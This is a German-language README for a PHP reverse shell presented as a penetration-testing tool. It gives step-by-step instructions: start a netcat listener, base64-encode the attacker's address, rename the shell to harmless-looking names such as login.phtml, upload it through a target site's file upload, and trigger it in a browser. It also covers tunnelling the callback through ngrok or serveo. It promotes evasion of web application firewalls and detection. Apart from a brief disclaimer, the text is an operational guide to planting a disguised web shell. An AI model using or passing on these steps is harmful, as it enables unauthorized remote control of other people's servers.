
Dies ist eine leistungsstarke und unauffällige PHP-Reverse-Shell, die für ethisches Hacking und Penetrationstests entwickelt wurde. Sie stellt eine zuverlässige und leise Verbindung zu Ihrem Rechner her.
Dies ist eine leistungsstarke und unauffällige PHP-Reverse-Shell, die für ethisches Hacking und Penetrationstests entwickelt wurde. Sie stellt eine zuverlässige und stille Verbindung zu Ihrem Rechner her.
Diese PHP-Reverse-Shell wird ausschließlich für Bildungs- und autorisierte Penetrationstests entwickelt.
Der Entwickler übernimmt keine Verantwortung für Missbrauch, Schäden oder illegale Aktivitäten, die mit dieser Reverse-Shell durchgeführt werden.
Verwenden Sie sie verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Unautorisierter Zugriff ist illegal und strafbar.
IP und Shell-Befehl sind Base64-kodiert für Tarnung
Funktionsnamen sind umgekehrt, um WAF und Sicherheitsfilter zu umgehen
Stiller Modus – keine Ausgabe zur Vermeidung von Erkennung
Automatische Wiederverbindung bei Verbindungsabbruch
Kann als Hintergrund-Daemon laufen (falls der Server dies unterstützt)
Funktioniert auf den meisten PHP-fähigen Servern
Unterstützt Tunneling-Dienste wie Ngrok, Serveo
Upload mit der Erweiterung .phtml, um einige Filter zu umgehen
1. Starten Sie einen Listener auf Ihrem Rechner
nc -lvnp 4444
2. Kodieren Sie Ihre IP oder Ihren Hostnamen in Base64
Verwenden Sie diesen einfachen Befehl:
echo "your_ip_or_hostname" | base64
Beispiel:
echo "192.168.1.5" | base64
Kopieren Sie die Ausgabe und ersetzen Sie den Wert von $ip_b64 im PHP-Reverse-Shell-Skript.
3. Aktualisieren Sie Ihr PHP-Reverse-Shell-Skript:
Ändern Sie diese Zeilen mit Ihrer Base64-kodierten IP/Ihrem Hostnamen und Port:
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;
4. Benennen Sie die Datei um und laden Sie sie hoch
Benennen Sie die Datei in etwas weniger Verdächtiges um, zum Beispiel:
login.phtml
avatar.phtml
update.phtml
Die Verwendung der Erweiterung .phtml hilft der Datei, auf Servern zu laufen, die .php blockieren.
Laden Sie diese Datei auf der Zielwebsite hoch, wo Datei-Uploads erlaubt sind.
5. Lösen Sie die Reverse-Shell aus
Öffnen Sie die hochgeladene Datei in einem Browser:
http://target.com/uploads/login.phtml
Sobald geöffnet, erhält Ihr Listener eine Reverse-Shell-Verbindung.
Wenn Sie mobile Daten verwenden oder hinter einem Router (NAT) sind, ist Ihre IP möglicherweise nicht öffentlich. In diesem Fall kann die Reverse-Shell Ihren Rechner nicht direkt erreichen.
Um dies zu beheben, verwenden Sie TCP-Tunneling-Tools wie Ngrok oder Serveo.
Ngrok installieren
Führen Sie diesen Befehl aus:
ngrok tcp 4444
Es wird ungefähr Folgendes anzeigen:
Forwarding tcp://4.tcp.ngrok.io:18900
Aktualisieren Sie Ihr PHP-Reverse-Shell-Skript:
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
Starten Sie Ihren Listener:
nc -lvnp 4444
Führen Sie diesen Befehl aus:
ssh -R 0:localhost:4444 serveo.net
Es wird ungefähr Folgendes sagen:
Forwarding TCP connections from serveo.net:46603
Aktualisieren Sie Ihr PHP-Reverse-Shell-Skript:
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
Starten Sie Ihren Listener:
nc -lvnp 4444
Dieses Projekt ist unter der GNU General Public License v3.0 lizenziert.